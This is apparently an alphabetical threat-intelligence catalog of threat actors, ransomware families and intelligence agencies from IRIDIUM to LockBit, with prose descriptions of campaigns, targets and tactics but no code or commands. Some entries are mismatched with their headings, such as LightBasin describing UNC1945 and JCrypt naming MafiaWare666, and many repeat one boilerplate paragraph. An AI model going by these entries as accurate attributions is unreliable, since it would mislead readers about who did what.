Resecurity’s research indicates that the attack on Parliament is a part of a multi-year cyberespionage campaign orchestrated by a nation-state actor whom we are calling IRIDIUM. This actor targets sensitive government, diplomatic, and military resources in the countries comprising the Five Eyes intelligence alliance (which includes Australia, Canada, New Zealand, the United Kingdom and the United States)
IRLeaks
IRLeaks is a threat actor known for significant cyberattacks targeting Iranian organizations, including a major breach of SnappFood, where they exfiltrated 3TB of sensitive data from 20 million user profiles. They have also compromised data from 23 leading Iranian insurance companies, offering over 160 million records for sale. Their operations involve extortion tactics, as seen in the ransom negotiations with Tosan, and they utilize malware such as StealC for data extraction. IRLeaks communicates primarily in Persian and has been active in selling stolen data on cybercriminal marketplaces.
Iron Group
Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect, at least, a few thousand victims.
Iron
It is currently unknown if Iron is indeed a new variant by the same creators of Maktub, or if it was simply inspired by the latter, by copying the design for the payment portal for example. We know the Iron ransomware has mimicked at least three ransomware families:Maktub (payment portal design) DMA Locker (Iron Unlocker, decryption tool) Satan (exclusion list)
Ironcat
ransomware
Ironchain
Ironchain is an active extortion or ransomware group tracked by RansomLook.
IronErn440
IronErn440 is a threat actor tracked by Oligo Security for orchestrating the ShadowRay 2.0 campaign, an evolution of attacks since September 2023 exploiting CVE-2023-48022, a missing authentication flaw in the Ray AI framework's Job Submission API. The actor submits malicious jobs to exposed Ray clusters (port 8265), deploying multi-stage Bash/Python payloads via GitHub/GitLab repositories like "ironern440-group" and "thisisforwork440-ops" to propagate worm-like, hijack NVIDIA GPUs for XMRig cryptomining, pivot laterally, create reverse shells, kill competing miners, limit CPU to 60%, and persist via cron jobs pulling updates every 15 minutes. Additional capabilities include DDoS via sockstress on port 3333 (targeting mining pools), region-specific malware (e.g., China checks), LLM-generated payloads, and use of tools like interact.sh for scanning over 230,500 public Ray servers; mitigations involve firewalling, authorization, and Anyscale's port checker.
IronHusky
IronHusky is a Chinese-based threat actor first attributed in July 2017 targeting Russian and Mongolian governments, as well as aviation companies and research institutes. Since their initial attacks ceased in 2018, they have been working on a new remote access trojan dubbed MysterySnail.
Ishtar Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.
IT.Books
ransomware
ItaDuke
ItaDuke is an actor known since 2013. It used PDF exploits for dropping malware and Twitter accounts to store C2 server urls. On 2018, an actor named DarkUniverse, which was active between 2009 to 2017, was attributed to this ItaDuke by Kaspersky.
Izis
Izis is an active extortion or ransomware group tracked by RansomLook.
J Group
J Group is an active extortion or ransomware group tracked by RansomLook.
J-
ransomware
JabaCrypter
ransomware
Jabaroot
JabaRoot is an Algerian hacker group that has targeted Moroccan government systems, successfully exfiltrating sensitive data from the Ministry of Economic Inclusion and the National Social Security Fund (CNSS). The group has claimed responsibility for the breach, which has raised concerns among cybersecurity experts regarding its scale and impact on citizens' privacy. The motives behind the attack remain unclear, but it has been noted as one of Morocco's most significant cyber-attacks affecting multiple victims. Resecurity has identified the group's activities as part of a broader trend of APT targeting government entities in the region.
JackPot Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Jaff
We recently observed several large scale email campaigns that were attempting to distribute a new variant of ransomware that has been dubbed "Jaff". Interestingly we identified several characteristics that we have previously observed being used during Dridex and Locky campaigns. In a short period of time, we observed multiple campaigns featuring high volumes of malicious spam emails being distributed, each using a PDF attachment with an embedded Microsoft Word document functioning as the initial downloader for the Jaff ransomware.
Jaffe
ransomware
JagerDecryptor
Ransomware Prepends filenames
James
ransomware
JapanLocker Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Base64 encoding, ROT13, and top-bottom swapping
Jasper Sleet
Microsoft threat actor profile. Origin/Threat: North Korea.
Java NotDharma
ransomware
JavaGhost
JavaGhost is a threat actor group that has targeted cloud environments, particularly AWS, for phishing campaigns without engaging in data theft for extortion. They exploit overly permissive IAM permissions and utilize long-term access keys to gain initial access, employing the GetFederationToken API to acquire temporary credentials for console access. JavaGhost has demonstrated advanced evasion techniques, avoiding common detection methods by not using the GetCallerIdentity API call. Their activities generate detectable logging footprints in CloudTrail, allowing organizations to identify and respond to their tactics.
jCandy
ransomware
JCrypt
Ransomware written in C#. Fortunately, all current versions of the MafiaWare666 ransomware are decryptable. The Threat Lab from Avast has developed a free decryption tool for this malware.
JeepersCrypt
ransomware
Jeff the Ransomware
Looks to be in-development as it does not encrypt.
Jeiphoos
Ransomware Windows, Linux. Campaign stopped. Actor claimed he deleted the master key.
Jemd
ransomware
JesusCrypt
ransomware
Jhon Woddy
Ransomware Same codebase as DNRansomware Lock screen password is M3VZ>5BwGGVH
Jigsaw
Ransomware Has a GUI
JINX-0126
Wiz Threat Research identified a new variant of an ongoing malicious campaign targeting misconfigured and publicly exposed PostgreSQL servers. In the observed attack, the threat actor (tracked by Wiz as JINX-0126) abuses exposed PostgreSQL instances, configured with weak and guessable login credentials, to gain access and to deploy XMRig-C3 cryptominers. This campaign was first documented by Aqua Security, but the threat actor has since evolved, implementing defense evasion techniques such as deploying binaries with a unique hash per target and executing the miner payload filelessly—likely to evade detection by CWPP solutions that rely solely on file hash reputation.
JNEC.a
ransomware
Jo Of Satan
Jo Of Satan is an active extortion or ransomware group tracked by RansomLook.
Job Crypter
Ransomware Based on HiddenTear, but uses TripleDES, decrypter is PoC
JoeGo
ransomware
JohnBorn
ransomware
JohnyCryptor
Ransomware
Joint Cipher Bureau
Joint Cipher Bureau
Joint Cyberspace Command
Joint Cyberspace Command (MCCE)
Joint Intelligence Organisation (United Kingdom)
Joint Intelligence Organisation (JIO)[32] – Joint intelligence analysis.
Joint Sigint Cyber Unit
Joint Sigint Cyber Unit (JSCU)
Joint Staff Department of the Central Military Commission Intelligence Bureau
Intelligence Bureau of the General Staff aka 2nd Bureau
Joint Task Force X
Joint Task Force X
JoJoCrypter
ransomware
Joker Korean
ransomware
Jokeroo
A new Ransomware-as-a-Service called Jokeroo is being promoted on underground hacking sites and via Twitter that allows affiliates to allegedly gain access to a fully functional ransomware and payment server. According to a malware researcher named Damian, the Jokeroo RaaS first started promoting itself as a GandCrab Ransomware RaaS on the underground hacking forum Exploit.in.
Jolly Roger
ransomware
JosepCrypt
ransomware
jsworm
JSWorm is a ransomware family that first appeared in May 2019 and is notable for undergoing multiple rebrands and evolutions, later appearing under names such as Nemty, Nefilim, Offwhite, Fusion, and Milihpen. Initially, it was distributed via malicious spam emails containing JavaScript files, hence the “JS” in its name. Later versions moved to targeted intrusions, leveraging compromised RDP services and vulnerable network appliances for initial access. JSWorm encrypts files using AES-256 encryption with RSA-2048 for key protection and appends campaign-specific extensions (e.g., .JSWORM, .Nemty, .Nephilim). The group adopted a double-extortion model in its later stages, stealing data before encryption and threatening to leak it via Tor-hosted sites. Its victimology spans various sectors worldwide, including manufacturing, energy, healthcare, and professional services. The continuous rebranding suggests an effort to evade detection, disrupt attribution, and maintain pressure on victims.
Judge
ransomware
JuiceLedger
JuiceLedger is a threat actor known for infostealing through their JuiceStealer .NET assembly. They have evolved from spreading fraudulent applications to conducting supply chain attacks, targeting PyPI contributors with phishing campaigns and typosquatting. Their malicious packages contain a code snippet that downloads and executes JuiceStealer, which has evolved to support additional browsers and Discord. Victims of JuiceLedger attacks are advised to reset passwords and report any suspicious activity to security@pypi.org.
JungleSec
Uses http://ccrypt.sourceforge.net/ encryption program
Juwon
ransomware
Kaandsona Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The word Kaandsona is Estonian, therefore the creator is probably from Estonia. Crashes before it encrypts
Kaenlupuf Ransomware
About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Kairos
Kairos is an extortion group that emerged with a data-leak site on 13 November 2024, claiming attacks against six organizations, primarily in the US healthcare sector. The group is financially motivated, demanding Bitcoin payments for the secure deletion of stolen files and threatening to leak data if victims do not comply. While no specific TTPs are publicly known, common techniques among extortion groups include phishing and scanning for exposed internet-facing devices. There is a potential link to a user on a Russian-language cybercriminal forum who shares a post-exploitation script, but attribution remains uncertain.
Kali
ransomware
Kamil
ransomware
Kampret
ransomware
Kangaroo Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. From the developer behind the Apocalypse Ransomware, Fabiansomware, and Esmeralda
Kappa
Made with OXAR builder; decryptable
Karakurt
Karakurt actors have employed a variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.
Karkadann
Karkadann is a threat actor that has been active since at least October 2020, targeting government bodies and news outlets in the Middle East. They have been involved in watering hole attacks, compromising high-profile websites to inject malicious JavaScript code. The group has been linked to another commercial spyware company called Candiru, suggesting they may utilize multiple spyware technologies. There are similarities in the infrastructure and tactics used by Karkadann in their campaigns.
Karma Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. pretends to be a Windows optimization program called Windows-TuneUp
karma
Ransomware.
Karmen Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. RaaS, baed on HiddenTear
Karo
ransomware
Kasablanka
The Kasablanka group is a cyber-criminal organization that has specifically targeted Russia between September and December 2022, using various payloads delivered through phishing emails containing socially engineered lnk files, zip packages, and executables attached to virtual disk image files.
Kasiski Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
kasseika
Kasseika is a ransomware variant first publicly reported in January 2024, identified as a new evolution of the BlackMatter/LockBit ransomware codebase. The malware appends the .kasseika extension to encrypted files and uses a double-extortion model, combining file encryption with threats to publish stolen data on a Tor-based leak site. Early analysis revealed that Kasseika shares several traits with LockBit 3.0, including encryption routines, obfuscation methods, and ransom note structure, but with modified branding and negotiation portals. Initial access vectors have not been widely confirmed, though patterns from related ransomware suggest the use of compromised credentials, RDP exploitation, and vulnerabilities in public-facing services. Victims have been observed in North America, Europe, and Asia, spanning industries like manufacturing, logistics, and professional services.
Katafrank
ransomware
Katyusha
ransomware
Kawa
Kawa is an active extortion or ransomware group tracked by RansomLook.
KawaiiLocker
Ransomware
KAX17
KAX17 is a sophisticated threat actor that has been active since at least 2017. They have operated hundreds of malicious servers within the Tor network, primarily as entry and middle points. Their main objective appears to be collecting information on Tor users and mapping their routes within the network. Despite efforts to remove their servers, KAX17 has shown resilience and continues to operate.
Kazu
Kazu is a financially motivated ransomware group known for employing a double extortion model, targeting sectors such as healthcare and government. The group has claimed responsibility for multiple high-profile breaches, including those of Manage My Health and the Defensoría del Pueblo de Colombia, exfiltrating sensitive data through techniques like exploiting unpatched vulnerabilities and credential reuse. Kazu has demanded ransoms ranging from $60,000 to $500,000, threatening public disclosure of stolen data if payments are not made. Their operations have primarily focused on entities in Latin America, Asia, and the Middle East, with a notable presence on dark web leak sites.
KCTF Locker
ransomware
KCW
ransomware
Kee
ransomware
Keksec
The threat group behind EnemyBot, Keksec, is well-resourced and has the ability to update and add new capabilities to its arsenal of malware on a daily basis (see below for more detail on Keksec)
KEKW
ransomware
KelvinSecurity
KelvinSecurity is a hacker group that has been active since at least 2015. They are known for their hacktivist and black hat activities, targeting public and private organizations globally. The group sells and leaks databases, documents, and access belonging to their victims, often on the dark web or their own platforms. They have been involved in attacks against various sectors, including telecommunications, political parties, and healthcare.
KeRanger
Ransomware OS X Ransomware
Kerkoporta
ransomware
Key Group
Key Group is an active extortion or ransomware group tracked by RansomLook.
KeyBTC
Ransomware
KEYHolder
Ransomware via remote attacker. tuyuljahat@hotmail.com contact address
KeyMaker
ransomware
Keymous+
Keymous is a threat actor known for executing extensive DDoS attacks across multiple Arab countries, targeting government ministries and critical infrastructure. The group has claimed access to sensitive data, including over 300,000 records from Israel's Ministry of Education, and has engaged in reconnaissance activities against various ministries in Bahrain and other nations. Keymous employs diverse infrastructure, including compromised IoT devices and DDoS-for-hire platforms, to amplify attack bandwidth. Their operations have been characterized by a focus on politically motivated cyberattacks, particularly in the context of regional conflicts.
KEYPASS
A new distribution campaign is underway for a STOP Ransomware variant called KeyPass based on the amount of victims that have been seen. Unfortunately, how the ransomware is being distributed is unknown at this time.
Killada
Killada is an active extortion or ransomware group tracked by RansomLook.
KillBot_Virus
ransomware
KillDisk-Dimens
ransomware
KillDisk Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Every file is encrypted with a personal AES-key, and then AES-key encrypts with a RSA-1028 key. Hacking by TeleBots (Sandworm). Goes under a fake name: Update center or Microsoft Update center.
KillerLocker
Ransomware Possibly Portuguese dev
Killnet
A group targeting various countries using Denial of Services attacked.
KillRabbit
ransomware
Killsec
Killsec is an active extortion or ransomware group tracked by RansomLook.
killsec3
killsec3 is an active extortion or ransomware group tracked by RansomLook.
KillSwitch
ransomware
KimcilWare
Ransomware websites only
Kindest
ransomware
KingOuroboros
This crypto-extortioner encrypts user data using AES, and then requires a $ 30- $ 50- $ 80 buy- back to BTC to return the files. The name is original. Written on AutoIt.
Kinsing
This group started operating during the first quarter of 2022. They published samples of alleged stolen data from companies on their site on Tor. It is unclear if they conducted the attacks themselves, or if they bought leaked databases from third parties.
Kirk Ransomware & Spock Decryptor
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Payments in Monero
Kirov
Kirov is an active extortion or ransomware group tracked by RansomLook.
Kiss-a-Dog
CrowdStrike identified a cryptojacking campaign targeting vulnerable Docker and Kubernetes infrastructure. Called “Kiss-a-dog,” the campaign targets Docker and Kubernetes infrastructure using an obscure domain from the payload, container escape attempt and anonymized “dog” mining pools.
Kittykatkrew
Kittykatkrew is an active extortion or ransomware group tracked by RansomLook.
KKK
ransomware
Knight
Knight is a Ransomware-as-a-Service (RaaS) operation first observed in August 2023, believed to be a rebrand or evolution of the Cyclops ransomware family. The ransomware targets both Windows and Linux/ESXi systems, encrypting files with strong symmetric and asymmetric cryptography and appending the .knight extension. Knight affiliates employ a double-extortion model, stealing sensitive data before encryption and threatening to leak it via a Tor-based site. Distribution methods include phishing campaigns delivering malicious attachments, exploitation of vulnerabilities in public-facing services, and use of previously compromised credentials. The ransomware is modular, allowing affiliates to deploy only the components needed for a given environment, and has been used in attacks on healthcare, manufacturing, finance, and technology sectors across North America, Europe, and Asia. Knight’s leak site lists victims with partial data dumps to pressure payment, escalating to full leaks if negotiations fail.
Knot
ransomware
KoKoKrypt Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread by its creator in forums. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files and documents and more. The ransom is 0.1 bitcoins within 72 hours. Uses Windows Update as a decoy. Creator: Talnaci Alexandru
Kolobo Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Kontoret för särskild inhämtning
Office for Special Acquisition – Kontoret för särskild inhämtning (KSI)
Koolova Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker of this ransomware tends to make lots of spelling errors in his requests. With Italian text that only targets the Test folder on the user's desktop
Korean
Ransomware Based on HiddenTear
Kostya Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Kovter
ransomware
Kozy.Jozy
Ransomware Potential Kit selectedkozy.jozy@yahoo.com kozy.jozy@yahoo.com unlock92@india.com
Kraken Cryptor Ransomware
The Kraken Cryptor Ransomware is a newer ransomware that was released in August 2018. A new version, called Kraken Cryptor 1.5, was recently released that is masquerading as the legitimate SuperAntiSpyware anti-malware program in order to trick users into installing it.
Kraken Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… The hacker requests 2 bitcoins in return for the files.
kraken
Kraken leak blog (hellokitty)
KratosCrypt
Ransomware kratosdimetrici@gmail.com
KRider Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Kriptovor
ransomware
KromSec
KromSec is a hacktivist group that claims to be composed of hackers, activists, writers, and journalists. The group has been involved in a number of high-profile cyberattacks, including a cyber offensive against Iran in September 2022 and the sale of the database of the Iran Ministry of Industries and Mines on a hacker forum in November 2023. KromSec's attacks have been met with mixed reactions, but the group has quickly made a name for itself as a significant threat to governments and organizations around the world.
Krybit
Krybit is a ransomware group that operates as a ransomware-as-a-service provider, offering affiliates 80% of ransom proceeds in exchange for technical support and a malware suite. The group has claimed attacks on various organizations across multiple countries, including asesoriauriel.com in Spain and fraper.com in Spain, without disclosing the volume of data exfiltrated. Krybit is currently engaged in a turf war with another group, 0APT, and has been accused of fabricating victim claims. Their leak site has been used to publish compromised data and to issue threats to rivals and victims alike.
Krypt
Krypt is an active extortion or ransomware group tracked by RansomLook.
Krypte
ransomware
Kryptina
Kryptina is an active extortion or ransomware group tracked by RansomLook.
KryptoLocker
Ransomware Based on HiddenTear
Kryptonite RBY
ransomware
Kryptonite Snake
ransomware
Kryptos
Kryptos is an active ransomware-as-a-service operation tracked by RansomLook.
Kuiper
Kuiper is a relatively new ransomware strain first analyzed in April 2023, notable for being written in Rust and designed to target multiple platforms, including Windows, Linux, and ESXi environments. The ransomware encrypts files with ChaCha20 symmetric encryption, securing keys with Curve25519, and appends the .kuiper extension to affected files. Kuiper operates under a double-extortion model, exfiltrating data before encryption and threatening to leak it on a Tor-hosted site if the ransom is not paid. Initial infection vectors are not widely documented, but analysis suggests potential use of compromised credentials, phishing, or exploitation of exposed services. The ransomware contains evasion techniques such as process termination, shadow copy deletion, and targeting of backup files to hinder recovery. Public reporting on Kuiper remains limited, indicating it may be in an early operational stage or used by a small number of actors.
Kupidon
ransomware
Kurdistan Region Security Council
Kurdistan Region Security Council (KRSC) - (Regional security agency)
Kuza
Kuza is an active extortion or ransomware group tracked by RansomLook.
Kyber
Kyber is an active extortion or ransomware group tracked by RansomLook.
L33TAF Locker Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 0.5 bitcoins. The name of the creator is staffttt, he also created Fake CryptoLocker
La Piovra
La Piovra is an active extortion or ransomware group tracked by RansomLook.
LabHost
LabHost is a threat actor group targeting Canadian Banks with Phishing-as-a-Service attacks. They have been observed using tools like LabRat and LabSend for real-time campaign management and SMS lures. LabHost's phishing campaigns have similarities to Frappo campaigns, but they operate separately and offer different subscription packages.
Ladon
ransomware
Lahav 433
Lahav 433 (Police intelligence)
Lalabitch_ransomware
ransomware
Lamashtu
Lamashtu is an active extortion or ransomware group tracked by RansomLook.
Lambda
Lambda is an active extortion or ransomware group tracked by RansomLook.
LambdaLocker Ransomware
It’s directed to English and Chinese speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Python Ransomware
Lamialocker
Lamialocker is an active extortion or ransomware group tracked by RansomLook.
Lancefly
Lancefly targets government, aviation, and telecom organizations in South and Southeast Asia. They use a custom backdoor named Merdoor, developed since 2018, and employ various tactics to gain access, including phishing emails, SSH credential brute-forcing, and exploiting server vulnerabilities. Additionally, Lancefly has been observed using a newer version of the ZXShell rootkit and tools like PlugX and ShadowPad RAT, which are typically associated with Chinese-speaking APT groups.
LandSlide
ransomware
LanRan
Ransomware Variant of open-source MyLittleRansomware
Larva-208
LARVA-208 is a financially motivated threat actor employing sophisticated phishing campaigns to harvest credentials and deploy ransomware. The actor uses multiple tactics, including Open URL Redirection, fake login pages, and social engineering, to bypass MFA and gain access to corporate networks. LARVA-208 has compromised over 618 organizations since June 2024, often deploying ransomware payloads. The threat actor is linked to LARVA-148, a threat actor managing domain acquisitions and attacks.
Larva-24005
Larva-24005 is a threat actor that breaches servers in Korea to establish a web server and PHP environment for phishing attacks, primarily targeting individuals involved with North Korea and university professors researching the regime. They exploit the BlueKeep vulnerability for initial access and utilize RDPWrap and a custom keylogger post-compromise. Phishing emails are crafted to appear as legitimate communications, often containing malicious URLs or compressed files. The actor has been observed storing phishing pages in the IIS_USER account and XAMPP home folder, although traces of these pages were later deleted.
Larva-24010
The Larva-24010 threat actor is distributing malware through the website of a Korean VPN service provider. As a result, when a user downloads and runs the installer from the VPN website, malware can be installed on the system. Since at least 2023, the Larva-24010 threat actor has been targeting Korean VPN users to spread malware, ultimately installing various backdoors such as MeshAgent, gs-netcat, and NKNShell. Through this, the attacker can control infected systems where the VPN is installed and steal sensitive information stored on those systems.
Larva‑25012
Larva‑25012 is a threat actor known for deploying Proxyware, utilizing malware disguised as a Notepad++ installer. The actor injects Proxyware into the Windows Explorer process and employs Python-based loaders to evade detection. They distribute Proxyware installers primarily through advertisements on websites offering free YouTube video downloads and fake sites for cracked software. Larva‑25012 has been active since at least 2024, distributing multiple types of Proxyware, including DigitalPulse, Honeygain, and Infatica.
Larva-26002
Larva-26002 targets improperly managed MS-SQL servers, exploiting vulnerabilities such as brute force and dictionary attacks. The actor has distributed Trigona and Mimic ransomware, utilizing the Bulk Copy Program for exploitation and installing remote access tools like AnyDesk and Teramind. In their attacks, they also deploy scanner malware, including ICE Cloud Client written in Go and a Rust-based scanner. After compromising systems, they execute commands to gather information about the infected environment.
late.lol
Affiliates:
@Mr.C
@Empathy
@jayze
@Widow
@Memory
LazagneCrypt
ransomware
Lazarus Group
Lazarus Group is a North Korean state-sponsored cyber threat group attributed to the Reconnaissance General Bureau (RGB). [US-CERT HIDDEN COBRA June 2017](https://www.us-cert.gov/ncas/alerts/TA17-164A) [Treasury North Korean Cyber Groups September 2019](https://home.treasury.gov/news/press-releases/sm774) Lazarus Group has been active since at least 2009 and is reportedly responsible for the November 2014 destructive wiper attack on Sony Pictures Entertainment, identified by Novetta as part of Operation Blockbuster. Malware used by Lazarus Group correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. [Novetta Blockbuster](https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf) North Korea’s cyber operations have shown a consistent pattern of adaptation, forming and reorganizing units as national priorities shift. These units frequently share personnel, infrastructure, malware, and tradecraft, making it difficult to attribute specific operations with high confidence. Public reporting often uses “Lazarus Group” as an umbrella term for multiple North Korean cyber operators conducting espionage, destructive attacks, and financially motivated campaigns. [Mandiant DPRK Laz Org Breakdown 2022](https://cloud.google.com/blog/topics/threat-intelligence/mapping-dprk-groups-to-government/) [Mandiant DPRK Groups 2023](https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023) [JPCert Blog Laz Subgroups 2025](https://blogs.jpcert.or.jp/en/2025/03/classifying-lazaruss-subgroup.html)
Lcryptorx
Lcryptorx is an active extortion or ransomware group tracked by RansomLook.
Leak Bazaar
Leak Bazaar is an active extortion or ransomware group tracked by RansomLook.
Leakeddata
Leakeddata is an active extortion or ransomware group tracked by RansomLook.
leaknet
In the cyber-undergrounds, we're exploring shadowed corridors of the digital world in search of inside information. we’re a digital watchdog operating at the intersection of cybersecurity, internet freedom, and investigative journalism. We delve into the hidden corners of the web, exposing truths and uncovering stories that are often buried by mainstream media or distorted by corporate interests.
This project isn’t just for tech experts or privacy advocates. It’s for everyone who values transparency, freedom, and integrity in a connected world. Operating independently, we’re free from corporate influence and political bias, enabling us to report with uncompromising honesty. Our work resonates with a diverse audience cybersecurity experts, digital rights activists, journalists, and anyone who values an internet free from control.
In a world where the lines between truth and agenda grow increasingly blurred, we’re building something bold, the space where the truth of the internet can be uncovered, untamed and unfiltered. Our project is an independent voice for digital freedom, committed to shining a light on the internet’s most vital and vulnerable spaces: cybersecurity, privacy, and the right to information without compromise.
In a landscape clouded by agendas and profit, we are here to do one thing: deliver the truth, boldly and beautifully. Join us as we push back against the systems that seek to compromise our digital freedoms and carve a path toward a more transparent, liberated internet.
Leakthemall
ransomware
Lebanese State Security
Lebanese State Security
LeChiffre
Ransomware Encrypts first 0x2000 and last 0x2000 bytes. Via remote attacker
Libyan Scorpions
Libyan Scorpions is a malware operation in use since September 2015 and operated by a politically motivated group whose main objective is intelligence gathering, spying on influentials and political figures and operate an espionage campaign within Libya.
Lick
Ransomware Variant of Kirk
LickyAgent
ransomware
Lifting Zmiy
Rostelecom's security team has discovered a new APT group that is breaching companies via industrial PLCs. Named Lifting Zmiy, the group's first attacks were traced back to October 2023. The group targeted PLCs from Russian company Tech-Automatics usually used with elevators and which were still using their default passwords. Rostelecom has linked the group to intrusions at a Russian government contractor, two telecom operators, and an IT company. The company says the group collected and exfiltrated data and then destroyed the victim's infrastructure. Rostelecom says Lifting Zmiy uses Starlink infrastructure for attacks and appears to operate out of Eastern Europe.
Light
ransomware
LightBasin
UNC1945 is an APT group that has been targeting telecommunications companies globally. They use Linux-based implants to maintain long-term access in compromised networks. UNC1945 has demonstrated advanced technical abilities, utilizing various tools and techniques to evade detection and move laterally through networks. They have also been observed targeting other industries, such as financial and professional consulting, and have been linked to other threat actors, including MustangPanada and RedDelta.
LightningCrypt
ransomware
LIGMA
ransomware
Lilac Typhoon
Lilac Typhoon is a threat actor attributed to China. They have been identified as exploiting the Atlassian Confluence RCE vulnerability CVE-2022-26134, which allows for remote code execution. This vulnerability has been used in cryptojacking campaigns and is included in commercial exploit frameworks. Lilac Typhoon has also been involved in deploying various payloads such as Cobalt Strike, web shells, botnets, coin miners, and ransomware.
LilacSquid
LilacSquid is an APT actor targeting a variety of industries worldwide since at least 2021. They use tactics such as exploiting vulnerabilities and compromised RDP credentials to gain access to victim organizations. Their post-compromise activities involve deploying MeshAgent and a customized version of QuasarRAT known as PurpleInk to maintain control over infected systems. LilacSquid has been observed using tools like Secure Socket Funneling for data exfiltration.
Lilith
Lilith is an active extortion or ransomware group tracked by RansomLook.
Lime
ransomware
LIMINAL PANDA
LIMINAL PANDA is a China-nexus APT that targets telecommunications entities, employing custom malware and publicly available tools for covert access, C2, and data exfiltration. The adversary demonstrates extensive knowledge of telecom networks, utilizing GSM protocols to retrieve mobile subscriber information and call metadata. LIMINAL PANDA exploits trust relationships and security gaps between providers to access core infrastructure, indicating a focus on SIGINT collection rather than financial gain. Their intrusion activity has primarily affected telecom providers in southern Asia and Africa, with potential for broader targeting based on network configurations.
LinkC Pub
Linkc is a newly emerged ransomware group that operates an onion-based data leak site and has claimed one victim, a U.S.-based AI and cloud service provider, H2O.ai, which was attacked on January 29, 2025. The group demanded a ransom of $15 million for data decryption and removal, showcasing access to sensitive information, including GPT model source code and customer data. Linkc's DLS is well-constructed and quick to load, indicating potential for future victim listings. However, there is currently no public acknowledgment from the victim, and the group has not engaged in discussions on cybercrime forums.
Linux.Encoder
Ransomware Linux Ransomware
Litra
ransomware
LittleFinger
ransomware
LK Encryption
Ransomware Based on HiddenTear
LLTP Locker
Ransomware Targeting Spanish speaking victims
LMAOxUS
ransomware
Lock2017 Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Lock93 Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
LockBit Ransomware Actors & Affiliates
